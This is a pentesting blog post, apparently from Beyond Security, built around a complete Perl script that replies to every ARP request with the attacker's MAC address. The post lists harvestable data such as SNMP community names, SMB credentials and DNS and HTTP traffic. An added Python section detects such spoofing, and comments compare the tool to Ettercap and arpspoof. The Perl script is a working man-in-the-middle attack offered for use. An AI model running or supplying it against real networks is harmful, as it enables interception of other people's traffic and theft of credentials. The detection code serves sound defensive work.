Me All – For your wifi pentesting pleasure

Sitting at a security conference in Boston, I wrote down a quick and dirty script that just listens for ARP requests and responds to any such request with … Hey, That is Me ™ :) … The things you can find using that… here is a summary:

1) SNMP community names
2) SMB keypairs (you need to use fakesmb)
3) DNS queries (if you answer them it is even more fun)
4) HTTP requests for odd stuff (once you have answered the DNS queries and set Apache to accept incoming connections, you are all set)

I am sure a lot more can be done… I will leave it to your imagination

#!/usr/bin/perl
# Written by Noam Rathaus, Beyond Security (r)

use strict;
use warnings;
use Net::Pcap;
use Net::ARP;

my $Interface = "eth1";

# Fallback MAC; replaced by the real address of $Interface if ifconfig reports one
my $mymac = "00:00:E4:CF:BE:AF";
if (open(IFCONFIG, "/sbin/ifconfig $Interface |"))
{
    while (<IFCONFIG>)
    {
        if ($_ =~ /HWaddr (.*)/)
        {
            $mymac = $1;
        }
    }
    close(IFCONFIG);
}

# Our MAC without colons, for comparison against the hex string unpack() yields
my $stripped = $mymac;
$stripped =~ s/://g;
my ($err, $filtert);

my $pcap_t = Net::Pcap::open_live($Interface, 60, 0, 10, \$err);
if (!defined($pcap_t))
{
    print "Pcap error: $err\n";
    exit(1);
}
if (Net::Pcap::datalink($pcap_t) != 1)
{
    print "Pcap error: only ethernet is currently supported\n";
    exit(0);
}

my $filter = "arp";
if (Net::Pcap::compile($pcap_t, \$filtert, $filter, 1, 0) == -1)
{
    print "Pcap error: filter failed to compile\n";
    exit(0);
}

Net::Pcap::setfilter($pcap_t, $filtert);
print STDOUT "[*] Monitoring requests...\n";

while (1)
{
    my %hdr;
    my $pkt = Net::Pcap::next($pcap_t, \%hdr);
    if (defined($pkt))
    {
        # Ethernet header (dst, src, type), then the ARP header: hardware type,
        # protocol type, both lengths and the high byte of the opcode end up in
        # $dunno; the low byte of the opcode (1 = request, 2 = reply) in $reply
        my ($ether_dst, $ether_src, $ether_type, $dunno, $reply,
            $arp_src_mac,
            $arp_src_ipa, $arp_src_ipb, $arp_src_ipc, $arp_src_ipd,
            $arp_dst_mac,
            $arp_dst_ipa, $arp_dst_ipb, $arp_dst_ipc, $arp_dst_ipd)
            = unpack('H12 H12 H4 H14 C H12 C4 H12 C4', $pkt);

        if ($reply == 2) { next; }                          # replies are ignored, only requests are answered
        if (lc($arp_src_mac) eq lc($stripped)) { next; }    # skip our own requests

        # Put the colons back into the 12-hex-digit MAC string
        $arp_src_mac =~ s/(..)(?=.)/$1:/g;

        $arp_dst_mac = $mymac;

        print "Src ($arp_src_mac): $arp_src_ipa.$arp_src_ipb.$arp_src_ipc.$arp_src_ipd\n";
        print "Dst ($arp_dst_mac): $arp_dst_ipa.$arp_dst_ipb.$arp_dst_ipc.$arp_dst_ipd\n";

        Net::ARP::send_packet($Interface,                                   # Device
            "$arp_dst_ipa.$arp_dst_ipb.$arp_dst_ipc.$arp_dst_ipd",          # Source IP
            "$arp_src_ipa.$arp_src_ipb.$arp_src_ipc.$arp_src_ipd",          # Destination IP
            "$arp_dst_mac",                                                  # Source MAC
            "$arp_src_mac",                                                  # Destination MAC
            'reply');                                                        # ARP operation
    }
}
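The flip side of a responder like this is that it leaves a very recognisable trace on the wire: a single MAC address answering for every IP anyone asks about, and IPs that suddenly resolve to two different MACs. The following is an added example (mine, not part of the original post or its script) of the detection logic a network monitor would run: it parses raw Ethernet/ARP frames with the same field layout the Perl unpack() template walks (14-byte Ethernet header, then hardware type, protocol type, lengths, opcode, sender MAC/IP, target MAC/IP) and flags both anomalies. The frames, MAC and IP addresses are constructed test data; the `threshold` parameter and all function names are my own choices.

```python
import struct
from collections import defaultdict

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, ethertype
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Build a raw Ethernet+ARP frame. Used here only to construct sample data."""
    smac = bytes.fromhex(sender_mac.replace(":", ""))
    tmac = bytes.fromhex(target_mac.replace(":", ""))
    sip = bytes(int(x) for x in sender_ip.split("."))
    tip = bytes(int(x) for x in target_ip.split("."))
    dst = b"\xff" * 6 if op == ARP_REQUEST else tmac   # requests are broadcast
    return ETH_HDR.pack(dst, smac, ETHERTYPE_ARP) + ARP_HDR.pack(
        1, 0x0800, 6, 4, op, smac, sip, tmac, tip)


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _, _, etype = ETH_HDR.unpack_from(frame)
    if etype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return op, mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa)


def find_answer_all(frames, threshold=3):
    """Scan ARP replies and return two findings:
    greedy    - MACs claiming more than `threshold` distinct IPs (an "answer everything" host)
    conflicts - IPs for which more than one MAC has sent a reply (a spoofed binding)
    Only replies are counted; requests carry no claim about who owns an address."""
    ips_by_mac = defaultdict(set)
    macs_by_ip = defaultdict(set)
    for f in frames:
        p = parse_arp(f)
        if p is None or p[0] != ARP_REPLY:
            continue
        _, smac, sip, _, _ = p
        ips_by_mac[smac].add(sip)
        macs_by_ip[sip].add(smac)
    greedy = {m: sorted(ips) for m, ips in ips_by_mac.items() if len(ips) > threshold}
    conflicts = {ip: sorted(ms) for ip, ms in macs_by_ip.items() if len(ms) > 1}
    return greedy, conflicts


# Constructed sample traffic: one request, two honest replies, and a rogue host
# (the script's placeholder MAC) replying for five addresses at once.
ROGUE = "00:00:e4:cf:be:af"
SAMPLE_FRAMES = [
    build_arp(ARP_REQUEST, "52:54:00:12:34:56", "10.0.0.9", "00:00:00:00:00:00", "10.0.0.1"),
    build_arp(ARP_REPLY, "52:54:00:aa:aa:01", "10.0.0.1", "52:54:00:12:34:56", "10.0.0.9"),
    build_arp(ARP_REPLY, "52:54:00:aa:aa:02", "10.0.0.2", "52:54:00:12:34:56", "10.0.0.9"),
] + [
    build_arp(ARP_REPLY, ROGUE, f"10.0.0.{i}", "52:54:00:12:34:56", "10.0.0.9")
    for i in range(1, 6)
]

if __name__ == "__main__":
    greedy, conflicts = find_answer_all(SAMPLE_FRAMES)
    for mac, ips in greedy.items():
        print(f"[!] {mac} replied for {len(ips)} addresses: {', '.join(ips)}")
    for ip, macs in conflicts.items():
        print(f"[!] {ip} claimed by several MACs: {', '.join(macs)}")
```

On a live segment the frames would come from a pcap handle opened with the same "arp" filter the script uses; the detector is deliberately stateless per batch so it can be run over a sliding window, and a threshold of three keeps routers doing legitimate proxy ARP for a handful of addresses out of the greedy list while a host answering for a whole subnet still trips it.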

  • Tyler

    …isn’t that exactly what Ettercap does?

  • http://blog.madduck.net madduck

    Also check out arpspoof in the dsniff suite.

  • roby

    The above code is just a simplified version of ettercap, arpspoof and dsniff written in perl, making it a bit easier to use..
